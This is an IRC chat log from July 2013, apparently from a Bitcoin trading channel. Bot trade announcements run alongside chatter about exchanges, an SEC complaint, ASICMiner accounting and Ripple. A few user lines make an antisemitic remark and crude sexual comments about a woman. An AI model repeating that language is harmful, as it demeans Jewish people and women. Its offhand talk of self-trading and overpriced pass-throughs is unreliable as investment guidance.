you the forum guy ? Jul 23 14:59:10 ya Jul 23 15:03:07 ;;ticker Jul 23 15:03:08 MtGox BTCUSD ticker | Best bid: 93.00005, Best ask: 93.83185, Bid-ask spread: 0.83180, Last trade: 93.89000, 24 hour volume: 11581.55944440, 24 hour low: 90.00000, 24 hour high: 94.48980, 24 hour vwap: 92.55908 Jul 23 15:12:11 ;;ident lom Jul 23 15:12:12 Nick 'lom', with hostmask 'Lom!87c4595f@gateway/web/freenode/ip.135.196.89.95', is not identified. Jul 23 15:12:51 [HAVELOCK] [HIM] 5 @ 0.254 = 1.27 BTC [+] Jul 23 15:23:44 [HAVELOCK] [AM100] 1 @ 0.0442889 BTC [-] Jul 23 15:26:41 [MPEX] [S.MPOE] 5250 @ 0.00080423 = 4.2222 BTC [-] Jul 23 15:28:28 7 hours downtime Jul 23 15:29:09 [HAVELOCK] [SMG] 1800 @ 0.000282 = 0.5076 BTC [-] Jul 23 15:29:46 i suspect the wall street jews are the ones behind the concept of 'weekends' Jul 23 15:30:08 bitstamp almost surpassed gox in volume Jul 23 15:30:15 lol wtf Jul 23 15:30:38 no work on weekends = less money Jul 23 15:30:42 yup Jul 23 15:31:44 death is merely the birth of something moar bettar Jul 23 15:32:09 erm.. Jul 23 15:32:23 I just need btct to come Jul 23 15:32:24 no posts from burnside? Jul 23 15:32:54 i bet he's sleeping ;) Jul 23 15:33:22 Havent found one yet Jul 23 15:33:26 bedside burning Jul 23 15:33:27 been combing through the forums Jul 23 15:34:11 ;;ticker Jul 23 15:34:12 MtGox BTCUSD ticker | Best bid: 93.01501, Best ask: 93.06999, Bid-ask spread: 0.05498, Last trade: 93.06999, 24 hour volume: 11641.06278093, 24 hour low: 90.00000, 24 hour high: 94.48980, 24 hour vwap: 92.57428 Jul 23 15:34:31 he must be diligently working his ass off to get the exchange open asap :p **** BEGIN LOGGING AT Wed Jul 24 00:14:15 2013 Jul 24 00:14:21 mp! Jul 24 00:14:23 the news! Jul 24 00:14:25 yea ? Jul 24 00:14:31 some douchebags in another channel are discussing it Jul 24 00:14:33 i ran with the btc ? Jul 24 00:14:38 and I dont really care either way Jul 24 00:15:14 [15:17] https://www.sec.gov/litigation/complaints/2013/comp-pr2013-132.pdf Jul 24 00:15:17 [BTCTC] [DMS.SELLING] 4 @ 0.02099 = 0.084 BTC [-] Jul 24 00:15:23 https://bitcointalk.org/index.php?topic=261236.msg2789233#msg2789233 Jul 24 00:15:42 mircea_popescu: how does mpoe-pr find threads to comment on? Jul 24 00:15:56 a that. yes. Jul 24 00:16:00 mjr_ i have no idea Jul 24 00:16:07 aha lol Jul 24 00:16:19 Defendants, directly or indirectly, singly or in concert.......This will get the passthrough operators Jul 24 00:16:24 "i made a grape foccacia like the one i had in florence" << her comment. Jul 24 00:16:35 samson_ yeah. Jul 24 00:16:50 https://bitcointalk.org/index.php?topic=261116.new#new Jul 24 00:16:57 2013-07-23 Wired.com - Why the Only Real Way to Buy Bitcoins Is on the Streets Jul 24 00:17:19 the forums are such a cesspool...who is gweedo anyway? Jul 24 00:17:34 he's an altcoin miner i think Jul 24 00:17:41 mjr_ nice answer. Jul 24 00:17:59 thanks Jul 24 00:18:03 gweedo is a sort of tradefortress. young guy, joined < 1 year ago, managed to mauintain interest Jul 24 00:18:05 i try to be civil Jul 24 00:18:22 [BTCTC] [TAT.ASICMINER] 50 @ 0.0457 = 2.285 BTC [+] Jul 24 00:18:23 [BTCTC] [DMS.MINING] 90 @ 0.01301 = 1.1709 BTC [-] Jul 24 00:18:23 thanks for the background Jul 24 00:18:26 [HAVELOCK] [HIM] 1 @ 0.225 BTC [-] Jul 24 00:18:29 which'd put him a step above the average six week old noob, Jul 24 00:18:35 and two steps above the random nut. Jul 24 00:18:39 hehehe Jul 24 00:19:08 mjr_ pm Jul 24 00:19:27 so now that we're done with teh news i met an incredible whore. Jul 24 00:19:33 will write about my amazement next. Jul 24 00:21:27 why can i not figure out how to ignore on this client :( Jul 24 00:21:50 what are you using? Jul 24 00:22:16 mjr_ incidentally, in case this isn't obvious to you : some larger organisation took an interest in buttcointalk sometime in may. as a result there's about 100 accounts they control. Jul 24 00:22:33 either some more recent sa project or some scammer troop, not clear, but anyway. Jul 24 00:23:11 Rulother_ pidgin Jul 24 00:23:23 doesn't /ignore X ALL work ? Jul 24 00:23:40 unknown command Jul 24 00:23:54 jesus pigdin sux Jul 24 00:23:54 [BTCTC] [DMS.MINING] 234 @ 0.0131 = 3.0654 BTC [+] Jul 24 00:24:10 Get xchat Jul 24 00:24:18 [HAVELOCK] [HIM] 1 @ 0.225 BTC [-] Jul 24 00:24:18 much cleaner and simple Jul 24 00:26:11 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003365 = 0.3365 BTC [+] Jul 24 00:26:29 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.003364 = 0.0505 BTC [-] Jul 24 00:26:51 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00336 = 0.0336 BTC [-] Jul 24 00:26:55 ^ Jul 24 00:27:49 I really like pidgin Jul 24 00:28:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.0457 = 0.457 BTC [+] Jul 24 00:28:27 i didn't mircea_popescu ran X or and DM on his linux install Jul 24 00:28:31 100% terminal yo Jul 24 00:28:39 thestringpuller!*@* added to ignore list. Jul 24 00:29:24 https://bitcointalk.org/index.php?topic=260075.0 Jul 24 00:29:29 How to apply pressure to Mt. Gox to pay up. Jul 24 00:29:30 l.o.l. Jul 24 00:30:02 I need to apply pressure to BFL to refund me for my singles Jul 24 00:30:30 lol, I like greyhawk response the best Jul 24 00:31:44 [BTCTC] [AMC-PT] 93 @ 0.003606 = 0.3354 BTC [+] Jul 24 00:32:02 [BTCTC] [AMC-PT] 62 @ 0.003604 = 0.2234 BTC [-] Jul 24 00:34:13 [MPEX] [S.MPOE] 253 @ 0.00080764 = 0.2043 BTC [+] Jul 24 00:34:28 [BTCTC] [RSM] 40 @ 0.0175 = 0.7 BTC [-] Jul 24 00:35:02 ThickAsThieves if you don't mind me saying so, asicminer's balance is an outrage. Jul 24 00:35:11 i understand they don't understand accounting. thatg's fine. Jul 24 00:35:25 why the fuck not use the an0 then, it's simple enough. why do the entire glbse thing in 2013 Jul 24 00:37:58 [BTCTC] [TAT.ASICMINER] 57 @ 0.0457 = 2.6049 BTC [+] Jul 24 00:38:00 [BTCTC] [TAT.ASICMINER] 20 @ 0.04598 = 0.9196 BTC [+] Jul 24 00:38:02 [BTCTC] [TAT.ASICMINER] 295 @ 0.04599 = 13.5671 BTC [+] Jul 24 00:38:04 [BTCTC] [TAT.ASICMINER] 68 @ 0.046 = 3.128 BTC [+] Jul 24 00:38:06 [BTCTC] [AMC-PT] 65 @ 0.003601 = 0.2341 BTC [-] Jul 24 00:38:32 can you elaborate on the AM thing? Jul 24 00:38:58 [BTCTC] [DMS.SELLING] 26 @ 0.02099 = 0.5457 BTC [-] Jul 24 00:39:30 [BTCTC] [TAT.ASICMINER] 4 @ 0.0457 = 0.1828 BTC [-] Jul 24 00:40:29 "BTC has no single administrator, or central authority or repository." Jul 24 00:40:32 pretty decent. Jul 24 00:40:50 I dont even know how to communicate AN0 one Jul 24 00:40:53 1 Jul 24 00:40:54 one Jul 24 00:40:55 hehe Jul 24 00:41:06 I'd pretty much have to offer to do their accounting Jul 24 00:41:21 and then rework it into your spec Jul 24 00:41:38 mjr_ have you read that balance sheet ? Jul 24 00:42:01 it has the following lines : cash, bitcoins, inventory, deposts and fixed assets. Jul 24 00:42:28 "deprecation" is somehow (how ?) part of fixed assets. Jul 24 00:42:30 Welcome to Google Docs Jul 24 00:42:32 [BTCTC] [TAT.ASICMINER] 34 @ 0.04598 = 1.5633 BTC [+] Jul 24 00:42:43 "tools and infrastructures" is a charge. Jul 24 00:42:53 [BTCTC] [TAT.ASICMINER] 16 @ 0.04598 = 0.7357 BTC [+] Jul 24 00:42:59 no wait, it's not a charge. it just figures among the charges Jul 24 00:43:04 deprecation is there twice. Jul 24 00:43:15 i mean... he just reinvented the exact thing an0 actually is, Jul 24 00:43:20 except he did it very, very badly. Jul 24 00:43:26 an0? Jul 24 00:43:43 yes yes. Jul 24 00:43:43 http://trilema.com/2013/accounting-for-the-nonzero-asset-corporation-the-mpex-standard/ Jul 24 00:43:47 Accounting for the nonzero asset corporation. The MPEx standard. pe Trilema - Un blog de Mircea Pope Jul 24 00:44:33 interesting Jul 24 00:44:36 ThickAsThieves actually you know what ? rewriting that shit would be worthwhile. i'll pay you 1 btc to do it just so i don't have to read the nonsense myself. Jul 24 00:44:40 publish it somewhere. Jul 24 00:44:53 "Consequently, all the subterfuge and nonsense induced in fiat accounting by this scourge upon humanity needs not be replicated in Bitcoin", hehe, reminds me of what a nightware VAT accounting is Jul 24 00:45:08 indeed. Jul 24 00:47:06 [BTCTC] [DMS.MINING] 18 @ 0.01301 = 0.2342 BTC [-] Jul 24 00:48:12 [BTCTC] [DMS.MINING] 41 @ 0.013 = 0.533 BTC [-] Jul 24 00:48:22 [BTCTC] [DMS.MINING] 82 @ 0.013 = 1.066 BTC [-] Jul 24 00:48:25 [BTCTC] [DMS.MINING] 1 @ 0.013 BTC [-] Jul 24 00:48:26 [BTCTC] [DMS.MINING] 9 @ 0.013 = 0.117 BTC [-] Jul 24 00:48:28 [BTCTC] [DMS.MINING] 240 @ 0.013 = 3.12 BTC [-] Jul 24 00:48:38 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003552 = 0.3552 BTC [+] Jul 24 00:48:40 [BTCTC] [TAT.VIRTUALMINE] 376 @ 0.003553 = 1.3359 BTC [+] Jul 24 00:49:04 [BTCTC] [DMS.MINING] 1 @ 0.0129 BTC [-] Jul 24 00:49:06 [BTCTC] [DMS.MINING] 100 @ 0.0129 = 1.29 BTC [-] Jul 24 00:49:13 o look it's back. Jul 24 00:49:17 what was the downtime ? Jul 24 00:49:52 (also someone tell the amc people to restart the selftrade script, quick, the hole is looking ridiculous) Jul 24 00:50:28 [BTCTC] [AMC-PT] 65 @ 0.003601 = 0.2341 BTC [-] Jul 24 00:50:30 [BTCTC] [AMC-PT] 5 @ 0.0036 = 0.018 BTC [-] Jul 24 00:50:31 [BTCTC] [AMC-PT] 125 @ 0.0036 = 0.45 BTC [-] Jul 24 00:50:33 ty Jul 24 00:50:33 [BTCTC] [AMC-PT] 100 @ 0.003588 = 0.3588 BTC [-] Jul 24 00:50:34 [BTCTC] [AMC-PT] 25 @ 0.003571 = 0.0893 BTC [-] Jul 24 00:51:08 Ripple doing its best to demonstrate what a hyperinflationary collapse looks like. Jul 24 00:51:34 It is returning to its true state Jul 24 00:51:38 0 Jul 24 00:51:57 Neil_ awww, and all the forum experts knowing bettar than mpoe-pr ? what of them ?! Jul 24 00:52:05 [BTCTC] [AMC-PT] 50 @ 0.00357 = 0.1785 BTC [-] Jul 24 00:52:10 [BTCTC] [AMC-PT] 50 @ 0.00356 = 0.178 BTC [-] Jul 24 00:52:12 [BTCTC] [AMC-PT] 100 @ 0.003559 = 0.3559 BTC [-] Jul 24 00:52:14 [BTCTC] [AMC-PT] 550 @ 0.003557 = 1.9564 BTC [-] Jul 24 00:52:37 mpoe-pr had an opinion? Jul 24 00:52:46 [BTCTC] [AMC-PT] 1 @ 0.003557 BTC [-] Jul 24 00:52:48 [BTCTC] [AMC-PT] 47 @ 0.003556 = 0.1671 BTC [-] Jul 24 00:52:54 she IS an opinion Jul 24 00:52:59 it's her job Jul 24 00:53:35 About 1 in 10 of her posts are worth reading. So generally I skip them if over a couple of lines. Jul 24 00:53:49 Neil_ you must have missed all the butthuirt on the forum over my "ripple is a scam" post etc huh Jul 24 00:53:59 [BTCTC] [TAT.ASICMINER] 86 @ 0.046 = 3.956 BTC [+] Jul 24 00:54:16 MPOE-PR has to prove that "she" exists Jul 24 00:54:27 by posting her tits with Scrat written on them Jul 24 00:55:07 great idea Jul 24 00:55:14 Link? Jul 24 00:55:31 I thought MP and MPOE-PR were different people, though I admit I sometimes wondered.... Jul 24 00:55:54 lol. Jul 24 00:56:04 Scrat im affraid all you get are the red heels. Jul 24 00:56:21 url? Jul 24 00:56:34 sigh. Jul 24 00:56:44 http://trilema.com/2013/the-stuff-all-good-conspiracy-theories-start-with/ Jul 24 00:56:47 The stuff all good conspiracy theories start with pe Trilema - Un blog de Mircea Popescu. Jul 24 00:57:08 oh yeah ive seen that Jul 24 00:57:33 [BTCTC] [AMC-PT] 49 @ 0.003677 = 0.1802 BTC [+] Jul 24 00:57:46 [BTCTC] [TAT.ASICMINER] 14 @ 0.0455 = 0.637 BTC [-] Jul 24 00:57:47 [BTCTC] [TAT.ASICMINER] 7 @ 0.0455 = 0.3185 BTC [-] Jul 24 00:57:55 [BTCTC] [DMS.MINING] 15 @ 0.012552 = 0.1883 BTC [-] Jul 24 00:57:56 and since im doing this, Neil_ https://bitcointalk.org/index.php?topic=215657.msg2265577#msg2265577 Jul 24 00:58:16 [BTCTC] [TAT.ASICMINER] 4 @ 0.0455 = 0.182 BTC [-] Jul 24 00:58:34 [BTCTC] [AMC-PT] 98 @ 0.003678 = 0.3604 BTC [+] Jul 24 00:59:45 [BTCTC] [DMS.PURCHASE] 1 @ 0.03379 BTC [+] Jul 24 00:59:55 [BTCTC] [AMC-PT] 75 @ 0.003557 = 0.2668 BTC [-] Jul 24 01:00:29 [BTCTC] [AMC-PT] 13 @ 0.003676 = 0.0478 BTC [+] Jul 24 01:00:49 i can name more people in that photo than i could the last time i saw it Jul 24 01:00:50 mircea_popescu: I guess so. Her posts are hard to read between the insults. I'd rather have a piece of the 21 million pie than the 100 billion pie, particularly at current rates. Jul 24 01:01:00 [BTCTC] [TAT.ASICMINER] 2 @ 0.046 = 0.092 BTC [+] Jul 24 01:01:16 Neil_ im not sure what you mean. Jul 24 01:01:27 ThickAsThieves interesting what growth means huh :p Jul 24 01:01:32 [BTCTC] [AMC-PT] 24 @ 0.003677 = 0.0882 BTC [+] Jul 24 01:01:34 [BTCTC] [AMC-PT] 74 @ 0.003558 = 0.2633 BTC [-] Jul 24 01:01:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.046 BTC [+] Jul 24 01:01:48 ThickAsThieves: Yeah I'm up to 3 people Jul 24 01:02:17 Who's Erik with? Jul 24 01:02:27 his wife Jul 24 01:02:31 Ah Jul 24 01:02:46 in retrospect i should have said "my ex gf" Jul 24 01:03:21 better drama. Jul 24 01:04:22 mircea_popescu: when's the next deposit flush round? Jul 24 01:05:29 [BTCTC] [ASICMINER-PT] 1 @ 4.71 BTC [+] Jul 24 01:05:54 should be a couple hours. Jul 24 01:06:07 kk Jul 24 01:06:41 [BTCTC] [AMC-PT] 90 @ 0.003647 = 0.3282 BTC [+] Jul 24 01:07:16 ;;calc 75000/70 Jul 24 01:07:16 1071.42857143 Jul 24 01:08:35 [MPEX] [S.MG] 10000 @ 0.00025 = 2.5 BTC [-] Jul 24 01:08:52 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00343 BTC [-] Jul 24 01:08:54 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0035 BTC [+] Jul 24 01:08:55 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.00352 = 0.0176 BTC [+] Jul 24 01:08:57 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003553 = 0.3553 BTC [+] Jul 24 01:09:37 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.003554 = 0.0533 BTC [+] Jul 24 01:09:38 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003556 = 0.0356 BTC [+] Jul 24 01:09:40 [BTCTC] [TAT.VIRTUALMINE] 113 @ 0.003558 = 0.4021 BTC [+] Jul 24 01:09:41 [BTCTC] [TAT.VIRTUALMINE] 46 @ 0.00356 = 0.1638 BTC [+] Jul 24 01:09:42 [BTCTC] [TAT.VIRTUALMINE] 500 @ 0.003578 = 1.789 BTC [+] Jul 24 01:09:50 So has BFL actually delivered something to more than 10 people who aren't Luke Jr? Jul 24 01:09:56 Yet Jul 24 01:10:03 nope Jul 24 01:10:10 What a farce Jul 24 01:10:15 [BTCTC] [AMC-PT] 75 @ 0.00356 = 0.267 BTC [-] Jul 24 01:10:16 [BTCTC] [AMC-PT] 12 @ 0.003559 = 0.0427 BTC [-] Jul 24 01:10:19 [BTCTC] [AMC-PT] 307 @ 0.003557 = 1.092 BTC [-] Jul 24 01:10:35 And LJ's "delivery" was more than 3 mths ago Jul 24 01:11:17 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003598 = 0.3598 BTC [+] Jul 24 01:11:19 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00365 BTC [+] Jul 24 01:11:20 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.00375 = 0.075 BTC [+] Jul 24 01:11:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.04545 BTC [-] Jul 24 01:11:31 [BTCTC] [ASICMINER-PT] 4 @ 4.7 = 18.8 BTC [-] Jul 24 01:11:33 [BTCTC] [TAT.ASICMINER] 50 @ 0.04545 = 2.2725 BTC [-] Jul 24 01:11:35 [BTCTC] [TAT.ASICMINER] 13 @ 0.04545 = 0.5909 BTC [-] Jul 24 01:12:06 ugh Jul 24 01:12:13 [BTCTC] [TAT.VIRTUALMINE] 88 @ 0.0038 = 0.3344 BTC [+] Jul 24 01:12:14 i really wish that ripple would recede into the void Jul 24 01:12:24 so tired of hearing about it, i thought it had gone away until today Jul 24 01:12:49 when apparently, there are some people who don't think its a scam (or more likely, know it is a scam, but want to be the scammer not the scamee) Jul 24 01:13:16 [BTCTC] [DMS.MINING] 40 @ 0.012551 = 0.502 BTC [-] Jul 24 01:13:17 [BTCTC] [DMS.MINING] 20 @ 0.012551 = 0.251 BTC [-] Jul 24 01:13:18 [BTCTC] [DMS.MINING] 40 @ 0.01255 = 0.502 BTC [-] Jul 24 01:13:20 [BTCTC] [DMS.MINING] 10 @ 0.01255 = 0.1255 BTC [-] Jul 24 01:13:22 [BTCTC] [DMS.MINING] 20 @ 0.0125 = 0.25 BTC [-] Jul 24 01:13:25 [BTCTC] [DMS.MINING] 70 @ 0.01243 = 0.8701 BTC [-] Jul 24 01:13:27 [BTCTC] [DMS.MINING] 30 @ 0.012019 = 0.3606 BTC [-] Jul 24 01:13:29 [BTCTC] [DMS.MINING] 10 @ 0.012018 = 0.1202 BTC [-] Jul 24 01:13:30 [BTCTC] [DMS.MINING] 20 @ 0.012018 = 0.2404 BTC [-] Jul 24 01:13:32 [BTCTC] [DMS.MINING] 23 @ 0.012018 = 0.2764 BTC [-] Jul 24 01:13:33 [BTCTC] [DMS.MINING] 30 @ 0.012018 = 0.3605 BTC [-] Jul 24 01:13:34 [BTCTC] [DMS.MINING] 2 @ 0.012 = 0.024 BTC [-] Jul 24 01:13:35 [BTCTC] [DMS.MINING] 1 @ 0.012 BTC [-] Jul 24 01:13:50 [BTCTC] [COGNITIVE] 16 @ 0.755 = 12.08 BTC [+] Jul 24 01:14:14 [BTCTC] [ASICMINER-PT] 1 @ 4.734 BTC [+] Jul 24 01:14:15 And LJ's "delivery" was more than 3 mths ago << and they were all indignant when bitbet ignored it lol Jul 24 01:14:15 [BTCTC] [TAT.ASICMINER] 52 @ 0.046 = 2.392 BTC [+] Jul 24 01:14:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.0453 BTC [-] Jul 24 01:14:46 [BTCTC] [TAT.ASICMINER] 60 @ 0.046 = 2.76 BTC [+] Jul 24 01:14:49 [BTCTC] [TAT.MINIGAME] 1 @ 0.000295 BTC Jul 24 01:14:52 ^^^^ Jul 24 01:15:06 Open for business on BTCT.co https://btct.co/security/TAT.MINIGAME Jul 24 01:15:12 grats ThickAsThieves Jul 24 01:15:17 [BTCTC] [AMC-PT] 98 @ 0.003599 = 0.3527 BTC [+] Jul 24 01:15:18 [BTCTC] [TAT.ASICMINER] 25 @ 0.046 = 1.15 BTC [+] Jul 24 01:15:30 it did get one No vote Jul 24 01:15:31 Anonymous voted NO with comment: Voting on the underlying asset; in principal company has potential but need more evidence of business plan including target markets, marketing plan, dev timelines, etc. Gaming is an incredibly expensive market to get into and without thus info it is hard to see how you will penetrate it. Will change vote if concerns addressed. Please show some clear Jul 24 01:15:31 financials! Jul 24 01:15:35 [BTCTC] [TAT.ASICMINER] 60 @ 0.046 = 2.76 BTC [+] Jul 24 01:15:45 and one mystery non-no, non-abstain vote Jul 24 01:16:01 [BTCTC] [TAT.ASICMINER] 5 @ 0.046 = 0.23 BTC [+] Jul 24 01:16:25 [BTCTC] [AMC-PT] 789 @ 0.0036 = 2.8404 BTC [+] Jul 24 01:16:44 [BTCTC] [TAT.ASICMINER] 9 @ 0.046 = 0.414 BTC [+] Jul 24 01:16:46 [BTCTC] [DMS.MINING] 1 @ 0.01139 BTC [-] Jul 24 01:16:48 [BTCTC] [DMS.MINING] 30 @ 0.011011 = 0.3303 BTC [-] Jul 24 01:16:49 [BTCTC] [DMS.MINING] 20 @ 0.011011 = 0.2202 BTC [-] Jul 24 01:16:51 [BTCTC] [DMS.MINING] 40 @ 0.01101 = 0.4404 BTC [-] Jul 24 01:16:52 [BTCTC] [DMS.MINING] 20 @ 0.011 = 0.22 BTC [-] Jul 24 01:16:54 [BTCTC] [DMS.MINING] 50 @ 0.011 = 0.55 BTC [-] Jul 24 01:16:56 [BTCTC] [DMS.MINING] 3 @ 0.011 = 0.033 BTC [-] Jul 24 01:16:58 [BTCTC] [DMS.MINING] 1 @ 0.0104 BTC [-] Jul 24 01:16:58 [BTCTC] [DMS.MINING] 100 @ 0.0102 = 1.02 BTC [-] Jul 24 01:16:59 [BTCTC] [DMS.MINING] 50 @ 0.010101 = 0.5051 BTC [-] Jul 24 01:17:00 my reply: The latest financial report is here: http://trilema.com/2013/smg-june-2013-statement/ you can also find more info about SMG's updates and plans in the provided link: http://trilema.com/category/smg/ Jul 24 01:17:00 [BTCTC] [DMS.MINING] 1 @ 0.01 BTC [-] Jul 24 01:17:02 [BTCTC] [DMS.MINING] 1 @ 0.01 BTC [-] Jul 24 01:17:07 aww. Jul 24 01:17:25 [BTCTC] [TAT.MINIGAME] 11 @ 0.000295 = 0.0032 BTC Jul 24 01:18:03 [BTCTC] [TAT.MINIGAME] 89 @ 0.000295 = 0.0263 BTC Jul 24 01:18:06 mircea , you gave bad karma to the AMC autotrade Jul 24 01:18:23 lol Jul 24 01:18:32 [MPEX] [S.MG] 100 @ 0.000267 = 0.0267 BTC [+] Jul 24 01:18:37 or they are running short of funds Jul 24 01:18:43 [BTCTC] [AMC-PT] 9 @ 0.003643 = 0.0328 BTC [+] Jul 24 01:18:45 [BTCTC] [TAT.MINIGAME] 3850 @ 0.000295 = 1.1358 BTC Jul 24 01:18:46 well bugs gotta be ironed out Jul 24 01:19:17 [BTCTC] [ASICMINER-PT] 1 @ 4.734 BTC [+] Jul 24 01:19:19 [BTCTC] [AMC-PT] 75 @ 0.00368 = 0.276 BTC [+] Jul 24 01:19:21 [BTCTC] [ASICMINER-PT] 1 @ 4.734 BTC [+] Jul 24 01:19:23 [BTCTC] [ASICMINER-PT] 1 @ 4.734 BTC [+] Jul 24 01:19:41 [BTCTC] [AMC-PT] 953 @ 0.003556 = 3.3889 BTC [-] Jul 24 01:19:43 [BTCTC] [AMC-PT] 100 @ 0.003555 = 0.3555 BTC [-] Jul 24 01:19:44 [BTCTC] [AMC-PT] 500 @ 0.003552 = 1.776 BTC [-] Jul 24 01:19:46 [BTCTC] [AMC-PT] 50 @ 0.003525 = 0.1763 BTC [-] Jul 24 01:19:48 [BTCTC] [AMC-PT] 3000 @ 0.003524 = 10.572 BTC [-] Jul 24 01:19:49 [BTCTC] [AMC-PT] 2000 @ 0.003523 = 7.046 BTC [-] Jul 24 01:19:51 [BTCTC] [AMC-PT] 4965 @ 0.003521 = 17.4818 BTC [-] Jul 24 01:20:21 [BTCTC] [TAT.MINIGAME] 8 @ 0.000295 = 0.0024 BTC Jul 24 01:20:23 [BTCTC] [ASICMINER-PT] 2 @ 4.734 = 9.468 BTC [+] Jul 24 01:20:27 [BTCTC] [TAT.MINIGAME] 500 @ 0.000295 = 0.1475 BTC Jul 24 01:20:33 [BTCTC] [COGNITIVE] 5 @ 0.755 = 3.775 BTC [+] Jul 24 01:20:36 [BTCTC] [COGNITIVE] 7 @ 0.755 = 5.285 BTC [+] Jul 24 01:20:37 [BTCTC] [COGNITIVE] 3 @ 0.755 = 2.265 BTC [+] Jul 24 01:21:03 [MPEX] [S.MG] 15000 @ 0.00025 = 3.75 BTC [-] Jul 24 01:22:35 [BTCTC] [DMS.MINING] 1 @ 0.01 BTC [-] Jul 24 01:23:36 [BTCTC] [DMS.MINING] 18 @ 0.01 = 0.18 BTC [-] Jul 24 01:23:51 [BTCTC] [DMS.SELLING] 18 @ 0.02099 = 0.3778 BTC [-] Jul 24 01:24:14 [BTCTC] [ASICMINER-PT] 1 @ 4.735 BTC [+] Jul 24 01:24:16 [BTCTC] [ASICMINER-PT] 1 @ 4.737 BTC [+] Jul 24 01:25:13 [HAVELOCK] [SDSTM] 15 @ 0.011 = 0.165 BTC [+] Jul 24 01:26:40 [BTCTC] [TAT.MINIGAME] 7 @ 0.000295 = 0.0021 BTC Jul 24 01:27:58 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00335 BTC [-] Jul 24 01:28:53 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0036 BTC [+] Jul 24 01:29:10 nice work ThickAsThieves, moar PT's! :) Jul 24 01:29:35 TAT.EVERYTHING Jul 24 01:30:11 TAT.KINGDOM4HORSE Jul 24 01:30:13 TAT.RAT.A.TAT.TAT Jul 24 01:30:23 TAT.AREYOUSICKOFMEYET Jul 24 01:30:43 [HAVELOCK] [AM100] 69 @ 0.0443001 = 3.0567 BTC [-] Jul 24 01:30:45 Someone should do a PT, or TAT's PTs Jul 24 01:30:45 [HAVELOCK] [AM100] 5 @ 0.0443 = 0.2215 BTC [-] Jul 24 01:30:47 [HAVELOCK] [AM100] 126 @ 0.0442 = 5.5692 BTC [-] Jul 24 01:30:55 sorry, that should be Jul 24 01:31:01 Someone should do a PT of TAT's PTs Jul 24 01:32:38 yo dawg... Jul 24 01:33:12 [BTCTC] [DMS.MINING] 17 @ 0.011 = 0.187 BTC [+] Jul 24 01:33:23 [BTCTC] [DMS.MINING] 15 @ 0.0115 = 0.1725 BTC [+] Jul 24 01:34:00 [BTCTC] [DMS.MINING] 2 @ 0.01002 = 0.02 BTC [-] Jul 24 01:35:27 [BTCTC] [DMS.MINING] 3 @ 0.01 = 0.03 BTC [-] Jul 24 01:35:33 [BTCTC] [DMS.MINING] 295 @ 0.01 = 2.95 BTC [-] Jul 24 01:35:46 [BTCTC] [DMS.SELLING] 134 @ 0.02099 = 2.8127 BTC [-] Jul 24 01:36:43 [BTCTC] [DMS.MINING] 50 @ 0.0115 = 0.575 BTC [+] Jul 24 01:36:45 [BTCTC] [DMS.MINING] 1 @ 0.01173 BTC [+] Jul 24 01:37:17 [BTCTC] [DMS.MINING] 43 @ 0.0102 = 0.4386 BTC [-] Jul 24 01:38:11 [BTCTC] [TAT.MINIGAME] 7 @ 0.000295 = 0.0021 BTC Jul 24 01:39:05 wassup benkay Jul 24 01:39:16 [BTCTC] [TAT.ASICMINER] 5 @ 0.04535 = 0.2268 BTC [-] Jul 24 01:39:18 [BTCTC] [TAT.ASICMINER] 14 @ 0.04535 = 0.6349 BTC [-] Jul 24 01:39:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.04535 = 0.1361 BTC [-] Jul 24 01:39:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.0453 BTC [-] Jul 24 01:39:26 [BTCTC] [TAT.ASICMINER] 45 @ 0.045235 = 2.0356 BTC [-] Jul 24 01:39:59 [BTCTC] [ASICMINER-PT] 2 @ 4.734 = 9.468 BTC [-] Jul 24 01:40:18 [BTCTC] [AMC-PT] 6 @ 0.003542 = 0.0213 BTC [+] Jul 24 01:40:25 ThickAsThieves: how does the pt work? Jul 24 01:40:34 as in pricing Jul 24 01:41:09 [BTCTC] [TAT.MINIGAME] 20527 @ 0.000295 = 6.0555 BTC Jul 24 01:41:31 [BTCTC] [ASICMINER-PT] 1 @ 4.737 BTC [+] Jul 24 01:41:31 [BTCTC] [DMS.SELLING] 298 @ 0.02099 = 6.255 BTC [-] Jul 24 01:42:13 lol someone just bought them all Jul 24 01:42:19 minigames Jul 24 01:42:23 [BTCTC] [ASICMINER-PT] 1 @ 4.737 BTC [+] Jul 24 01:42:55 choose random price somewhere above what the underlying is at. idiocy takes care of teh rest Jul 24 01:43:31 what's a few bitcoins here and there Jul 24 01:44:41 [BTCTC] [GSDPT] 843 @ 0.003449 = 2.9075 BTC [+] Jul 24 01:45:09 [BTCTC] [MININGCO.ETF] 2 @ 2 = 4 BTC [-] Jul 24 01:46:10 so presumably btctctcccctttcctt is workig for some people Jul 24 01:46:18 dub: lol Jul 24 01:46:20 [BTCTC] [GSDPT] 670 @ 0.00345 = 2.3115 BTC [+] Jul 24 01:46:22 worst initials ever Jul 24 01:46:25 yep Jul 24 01:46:46 I know, lets make a brand thats completely impossible to remember Jul 24 01:46:54 [BTCTC] [DMS.SELLING] 10 @ 0.0207 = 0.207 BTC [-] Jul 24 01:47:00 [BTCTC] [DMS.SELLING] 10 @ 0.0206 = 0.206 BTC [-] Jul 24 01:47:02 i have to count out letters on my fingers Jul 24 01:47:02 [BTCTC] [DMS.SELLING] 100 @ 0.02051 = 2.051 BTC [-] Jul 24 01:47:04 [BTCTC] [DMS.SELLING] 2 @ 0.02051 = 0.041 BTC [-] Jul 24 01:47:07 [BTCTC] [DMS.SELLING] 50 @ 0.0202 = 1.01 BTC [-] Jul 24 